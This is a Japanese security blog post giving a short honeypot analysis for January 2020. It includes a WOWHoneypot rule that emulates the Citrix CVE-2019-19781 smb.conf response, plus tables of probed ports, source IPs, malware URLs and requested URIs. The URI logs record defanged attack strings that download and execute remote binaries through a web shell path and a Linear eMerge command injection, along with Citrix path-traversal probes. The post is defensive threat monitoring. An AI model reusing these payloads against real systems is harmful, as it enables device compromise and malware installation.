sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/20)

Citrix製品の脆弱性CVE-2019-19781ですが、WOWHoneypotのmrrules.xmlでレスポンスをきちんと定義してあげると攻撃を観測できました。

mrrules.xmlに以下を追加し、art配下にCitrix_smb_conf.txtを追加しています。

-----mrrules.xmlの追加分-------

<mrr>

    <meta>

      <mrrid>20001</mrrid>

      <enable>True</enable>

      <note>CVE-2019-19781 (Citrix ADC)</note>

    </meta>

    <trigger>

            <uri>/vpn/../vpns/cfg/smb.conf</uri>

    </trigger>

    <response>

      <status>200</status>

      <body filename="Citrix_smb_conf.txt"></body>

    </response>

  </mrr>

----Citrix_smb_conf.txt----

[global]

                encrypt passwords = yes

                name resolve order = lmhosts wins host bcast

 



以下、簡易分析となります。

<Honeytrap>
Local Port Top 10
LocalPort Count
1433 318158 件
445 980 件
3389 808 件
3391 215 件
52869 104 件
81 93 件
25 64 件
5007 60 件

Remote IP Top 10
RemoteIP Count
223[.]26[.]92[.]56 25768 件
153[.]19[.]11[.]3 25010 件
37[.]186[.]126[.]201 23798 件
194[.]135[.]224[.]42 23122 件
180[.]254[.]47[.]161 17671 件
110[.]137[.]100[.]135 17443 件
39[.]59[.]37[.]139 15364 件
14[.]177[.]111[.]117 15197 件

Malware
Malware Count
No Malware 327822 件
hxxp://51[.]77[.]213[.]109/mips 17 件
hxxp://fid[.]hognoob[.]se/download[.]exe 8 件
hxxp://switchnets[.]net/unstable 3 件
hxxp://91[.]92[.]66[.]124/ 3 件
hxxp://167[.]172[.]217[.]87/EskDfbins[.]sh 2 件
hxxp://167[.]172[.]155[.]138/EkSgsEdbins[.]sh 2 件
hxxp://174[.]128[.]226[.]101/mps 2 件

<wowhoneypot>
URI Path
URI PATH Count
/ Target:- 36 件
/admin/assets/js/views/login[.]js Target:FreePBX 10 件
/shell Target:wegshell 7 件
/admin/i18n/readme[.]txt Target:text 3 件
/recordings/theme/main[.]css Target:FreePBX 3 件
/admin/config[.]php Target:PHP 3 件
/card_scan_decoder[.]php Target:Linear eMerge E3-Series 2 件
/fa/ Target:new path 1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Target:new path 1 件
/w00tw00t[.]at[.]blackhats[.]romanian[.]anti-sec:) Target:new path 1 件
/phpMyAdmin/scripts/setup[.]php Target:new path 1 件
/phpmyadmin/scripts/setup[.]php Target:new path 1 件
/pma/scripts/setup[.]php Target:new path 1 件
/myadmin/scripts/setup[.]php Target:new path 1 件
/MyAdmin/scripts/setup[.]php Target:new path 1 件Remote IP

 

Top 10RemoteIP Count
77[.]247[.]108[.]77 12 件
77[.]247[.]108[.]119 7 件
223[.]112[.]190[.]70 6 件
80[.]85[.]86[.]175 3 件
18[.]218[.]222[.]65 3 件
172[.]105[.]4[.]63 2 件
219[.]254[.]138[.]113 1 件
118[.]24[.]23[.]164 1 件

All URI
URI Count
/ Target:- 36 件
/admin/assets/js/views/login[.]js Target:FreePBX 10 件
/shell?cd+/tmp;rm+-rf+[.]j;wget+hxxp:/\/91[.]92[.]66[.]124/[.][.]j/[.]j;chmod+777+[.]j;sh+[.]j;echo+DONE Target:wegshell 7 件
/admin/i18n/readme[.]txt Target:text 3 件
/recordings/theme/main[.]css Target:FreePBX 3 件
/admin/config[.]php Target:PHP 3 件
/card_scan_decoder[.]php?No=30&door=wgethxxp://switchnets[.]net/hoho[.]arm7;chmod777hoho[.]arm7;[.]/hoho[.]arm7linear Target:Linear eMerge E3-Series 2 件
/fa/ Target:new path 1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd?type=rau Target:new path 1 件
/w00tw00t[.]at[.]blackhats[.]romanian[.]anti-sec:) Target:new path 1 件
/phpMyAdmin/scripts/setup[.]php Target:new path 1 件
/phpmyadmin/scripts/setup[.]php Target:new path 1 件
/pma/scripts/setup[.]php Target:new path 1 件
/myadmin/scripts/setup[.]php Target:new path 1 件
/MyAdmin/scripts/setup[.]php Target:new path 1 件


 
URI Path
URI PATH Count
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/ Target:- 9 件
/vpns/cfg/smb[.]conf Target:new path 6 件
/vpn/[.][.]/vpns/cfg/smb[.]conf Target:Citrix ADC/Citrix Gateway 5 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/favicon[.]ico Target:new path 4 件
/vpn/[.][.]/vpns/portal/scripts/newbm[.]pl Target:Citrix ADC/Citrix Gateway 3 件
//vpns/portal/scripts/newbm[.]pl Target:new path 2 件
/vpn/[.][.]/vpns/portal/vTnjexmDJarzJgSawqkyOqlHHsaKXSYBQ[.]xml Target:Citrix ADC/Citrix Gateway 2 件
//vpns/portal/G1TEZEA16HY3[.]xml Target:new path 1 件
/vpns/portal/scripts/newbm[.]pl Target:new path 1 件
/vpns/portal/M7HP9DSNGAQ3[.]xml Target:new path 1 件
//vpns/portal/YPOOH06Y70ZU[.]xml Target:new path 1 件
/sdk Target:new path 1 件
/vpn/\[.]\[.]/vpns/cfg/smb[.]conf Target:new path 1 件
/vpns/cfg/smb[.]cof Target:new path 1 件
/niceports,/Trinity[.]txt[.]bak Target:text 1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Target:new path 1 件
 
Remote IP Top 10
RemoteIP Count
164[.]70[.]224[.]8 21 件
77[.]247[.]108[.]77 16 件
77[.]247[.]108[.]119 7 件
194[.]87[.]103[.]156 6 件
172[.]105[.]4[.]63 3 件
80[.]85[.]86[.]175 2 件
193[.]57[.]40[.]46 1 件
52[.]56[.]180[.]132 1 件
 
All URI
URI Count
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/ Target:- 9 件
/vpns/cfg/smb[.]conf Target:new path 6 件
/vpn/[.][.]/vpns/cfg/smb[.]conf Target:Citrix ADC/Citrix Gateway 5 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/favicon[.]ico Target:new path 4 件
/vpn/[.][.]/vpns/portal/scripts/newbm[.]pl Target:Citrix ADC/Citrix Gateway 3 件
//vpns/portal/scripts/newbm[.]pl Target:new path 2 件
/vpn/[.][.]/vpns/portal/vTnjexmDJarzJgSawqkyOqlHHsaKXSYBQ[.]xml Target:Citrix ADC/Citrix Gateway 2 件
//vpns/portal/G1TEZEA16HY3[.]xml Target:new path 1 件
/vpns/portal/scripts/newbm[.]pl Target:new path 1 件
/vpns/portal/M7HP9DSNGAQ3[.]xml Target:new path 1 件
//vpns/portal/YPOOH06Y70ZU[.]xml Target:new path 1 件
/sdk Target:new path 1 件
/vpn/\[.]\[.]/vpns/cfg/smb[.]conf Target:new path 1 件
/vpns/cfg/smb[.]cof Target:new path 1 件
/niceports,/Trinity[.]txt[.]bak Target:text 1 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd?type=rau Target:new path 1 件